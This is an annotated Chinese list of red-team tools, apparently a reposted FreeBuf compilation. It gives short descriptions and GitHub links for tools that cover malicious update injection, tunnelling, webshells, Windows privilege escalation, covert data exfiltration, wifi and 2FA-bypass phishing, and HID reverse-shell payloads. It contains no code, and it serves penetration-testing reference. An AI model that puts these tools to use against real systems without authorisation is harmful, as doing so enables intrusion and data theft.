    Evilgrade :一个模块化的脚本框架,使攻击者可以通过注射”evil”更新到不知道用户的更新。https://github.com/infobyte/evilgrade

    NetRipper:是一款针对Windows操作系统的漏洞利用工具,它可以使用API hooking从一个低权限的用户那里截获网络通信数据以及与加密相关的信息,而且还可以捕获明文通信数据以及经过加密的通信数据。https://github.com/NytroRST/NetRipper

    隧道通信

    Tunna:一款神奇的工具,它可以通过HTTP封装隧道通信任何TCP,以及用于绕过防火墙环境中的网络限制。https://github.com/SECFORCE/Tunna

    reGeorg:reDuh 的升级版,主要是把内网服务器的端口通过http/https隧道转发到本机,形成一个回路。用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口。https://github.com/sensepost/reGeorg

    Blade:是一个基于控制台的webshell连接工具。https://github.com/wonderqs/Blade

    Tinyshell:一个简易的shell命令解释器。https://github.com/threatexpress/tinyshell

    PowerLurk:用于构建恶意WMI事件Subsriptions的PowerShell工具集。https://github.com/Sw4mpf0x/PowerLurk

    DAMP:ACL修改项目。https://github.com/HarmJ0y/DAMP

    提权

    域提权

    PowerView:是一个PowerShell工具,用于获取Windows域的网络态势感知。https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1

    Get-GPPPassword:检索通过组策略首选项推送的帐户的明文密码和其他信息。https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1

    Invoke-ACLpwn:是一个Powershell脚本,可以使用集成的凭据或者指定的凭据来运行。这款工具的工作原理是使用SharpHound导出域内所有ACL以及当前用户账户下的组成员关系。如果用户不具备域对象的writeDACL权限,该工具会枚举域内ACL的所有ACE。https://github.com/fox-it/Invoke-ACLPwn

    BloodHound:强大的内网域渗透提权分析工具。https://github.com/BloodHoundAD/BloodHound

    PyKEK(Python Kerberos利用工具包),一个用于处理KRB5相关数据的python库。https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek

    本地提权

    UACMe:是一款开源评估工具,其中包含许多用于在多个版本的操作系统上绕过Windows用户帐户控制的方法。https://github.com/hfiref0x/UACME

    windows-kernel-exploits:windows kernel exploit集合。https://github.com/SecWiki/windows-kernel-exploits

    PowerUp:是本地特权提升的一些调用方法,功能相当强大,拥有众多实用的脚本来帮助我们寻找目标主机Windows服务漏洞进行提权。也是 PowerShell Empire和PowerSploit 的一部分。https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1

    The Elevate Kit:演示如何在Cobalt Strike的Beacon payload中使用PowerShell以及反射DLL exploit。https://github.com/rsmudge/ElevateKit

    Sherlock:一个在Windows下用于本地提权的PowerShell脚本。https://github.com/rasta-mouse/Sherlock

    Tokenvator:一款利用Windows Tokens提权的工具。https://github.com/0xbadjuju/Tokenvator

    数据盗取

    CloakifyFactory & the Cloakify Toolset – 数据盗取,躲避DLP/MLS数据泄露防护系统,社会工程学分析,突破数据白名单控制,躲避AV检测。https://github.com/TryCatchHCF/Cloakify

    DET:是一个概念界定,描述能同时使用单独或多个通道执行数据渗透。https://github.com/sensepost/DET

    DNSExfiltrator :利用DNS解析进行数据隐秘传输的工具。https://github.com/Arno0x/DNSExfiltrator

    PyExfil:用于数据盗取的PyExfil Python软件包。https://github.com/ytisf/PyExfil

    Egress-Assess:一个通过多种协议模拟数据渗透的工具。https://github.com/ChrisTruncer/Egress-Assess

    PowerShell-RAT:一款基于Python的后门程序。它不仅可以使用屏幕捕捉功能来跟踪用户的活动,而且还可以通过电子邮件附件来将提取出的数据发送给攻击者。https://github.com/Viralmaniar/Powershell-RAT

    杂项

    无线网络

    Wifiphisher:能够对WPA加密的AP无线热点实施自动化钓鱼攻击,并获取密码账户。https://github.com/wifiphisher/wifiphisher

    Evilginx:可绕过双因素验证的高级钓鱼框架。https://github.com/kgretzky/evilginx

    Mana:是一款国外安全人员为测试而开发的Wifi劫持工具,可以监听计算机或其他移动设备的Wifi通信,并能够模仿该设备。https://github.com/sensepost/mana

    嵌入式和外围设备渗透

    MagSpoof:能预测并窃取你下一张信用卡号码的廉价设备 。https://github.com/samyk/magspoof

    WarberryPi:为了“红队判研”(red teaming)而创建,因为在“红队判研”中,我们想在短时间内尽可能隐秘地获取更多信息。只要找到一个网络端口,插入即可。脚本的设计主要是通过找到 避免网络内噪声被发现且尽可能有效的方法加以实现。WarBerry脚本集扫描工具于一体,从而实现该功能。https://github.com/secgroundzero/warberry

    P4wnP1 :为树莓派安装网络劫持键盘注入(WHID)工具。https://github.com/mame82/P4wnP1

    malusb:创建跨平台的HID欺骗payload,并在Windows和OSX上建立反向TCP-shell。https://github.com/ebursztein/malusb

    Fenrir:是一款设计用于渗透测试的“开箱即用”工具。其主要功能和用途是绕过有线802.1x保护并使你能够访问目标网络。https://github.com/Orange-Cyberdefense/fenrir-ocd

    团队沟通

    Rocket.Chat:一个功能强大的团队合作聊天工具。https://rocket.chat/

    EtherPad:多人即时文件协作平台。https://etherpad.net/

    脚本

    Aggressor脚本:大多数Cobalt Strike对话框和功能都是作为独立模块编写的,这些模块向Aggressor Script引擎提供了一些接口如default.cna定义了默认的Cobalt Strike的工具栏按钮,弹出式菜单,除此之外可以利用提供的API来模拟红队成员与你并肩作战以及扩展跟修改Cobalt Strike的现有功能等。

    https://github.com/invokethreatguy/CSASC

    https://github.com/secgroundzero/CS-Aggressor-Scripts

    https://github.com/Und3rf10w/Aggressor-scripts

    https://github.com/harleyQu1nn/AggressorScripts

    https://github.com/rasta-mouse/Aggressor-Script

    https://github.com/RhinoSecurityLabs/Aggressor-Scripts

    https://github.com/bluscreenofjeff/AggressorScripts

    https://github.com/001SPARTaN/aggressor_scripts

    适用于红队和渗透测试的脚本:

    https://github.com/FuzzySecurity/PowerShell-Suite

    https://github.com/nettitude/Powershell

    https://github.com/Mr-Un1k0d3r/RedTeamPowershellScripts

    https://github.com/threatexpress/red-team-scriptsh

    https://github.com/SadProcessor/SomeStuff

    https://github.com/rvrsh3ll/Misc-Powershell-Scripts

    https://github.com/enigma0x3/Misc-PowerShell-Stuff

    https://github.com/ChrisTruncer/PenTestScripts

    https://github.com/bluscreenofjeff/Scripts

    https://github.com/xorrior/RandomPS-Scripts

    https://github.com/xorrior/Random-CSharpTools

    https://github.com/leechristensen/Random

    https://github.com/mgeeky/Penetration-Testing-Tools/tree/master/social-engineering

    参考

    MITRE’s ATT&CK是一个向美国政府提供系统工程、研究开发和信息技术支持的美国非营利性组织。基于ATT&CK(对抗战术、技术与常识)知识库的端点检测和响应(EDR)产品进行评估,以加强行业和客户的网络攻击对策。https://attack.mitre.org/wiki/Main_Page

    涵盖多个项目的速查手册(Beacon / Cobalt Strike,PowerView,PowerUp,Empire和PowerSploit)。https://github.com/HarmJ0y/CheatSheets

    PRE-ATT&CK对抗战术,技术和通用知识。https://attack.mitre.org/pre-attack/index.php/Main_Page

    Adversary OPSEC包括使用各种技术或第三方服务来混淆,隐藏网络流量或系统行为。https://attack.mitre.org/pre-attack/index.php/Adversary_OPSEC

    为了展示ATT&CK对于攻击性运营商和防御者的实际使用,MITRE创建了Adversary Emulation Plans 。https://attack.mitre.org/wiki/Adversary_Emulation_Plans

    红色团队维基基础架构。https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki

    Advanced Threat Tactics(高级威胁战术) – 课程和笔记。关于红队运作和对手模拟的免费课程。https://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-course-and-notes

    @vysecurityz在Twitter上的关于红队Tips的文章。https://vincentyiu.co.uk/red-team-tips

    优秀红队资源列表。https://github.com/yeyintminthuhtut/Awesome-Red-Teaming

    用于企业软件的ATT&CK。https://attack.mitre.org/wiki/Software

    红队练习计划。https://github.com/magoo/redteam-plan

    关于锁,保险箱和钥匙安全性的资源精选列表。https://github.com/meitar/awesome-lockpicking

    优秀的威胁情报资源精选列表。https://github.com/hslatman/awesome-threat-intelligence

    APTnotes是一个按年份排序用于存储各种APT相关的公开可用文档和记录的存储库。https://github.com/aptnotes/data

    TIBER-EU框架是欧洲首个针对可控网络黑客行为的框架,可在多个当局监督的情况下测试跨境实体的网络弹性。http://www.ecb.europa.eu/pub/pdf/other/ecb.tiber_eu_framework.en.pdf

    *参考来源:GitHub ,FB小编 secist 编译,转载请注明来自FreeBuf.COM

    https://www.freebuf.com/sectool/175767.html

    展开全文
  • 针对网络的渗透测试项目一般包括:信息收集、端口扫描、指纹识别、漏洞扫描、绘制网络拓扑、识别代理、记录结果等。 信息收集 DNS dns信息包含(A, MX, NS, SRV, PTR, SOA, CNAME) 记录,了解不同记录的含义至关...
  • x-can,流光,pstools,smbcrack2 解压后test文件就是,聪明的你不懂看readme
  • 2017最新渗透测试工具包。 工具只作为参考和学习,禁止非法用途, 工具只作为参考和学习,禁止非法用途, 工具只作为参考和学习,禁止非法用途, 重要的事要说三遍 从事非法活动,后果自负哦

空空如也

1 2 3 4 5 ... 20
收藏数 4,161
精华内容 1,664
关键字:

渗透测试工具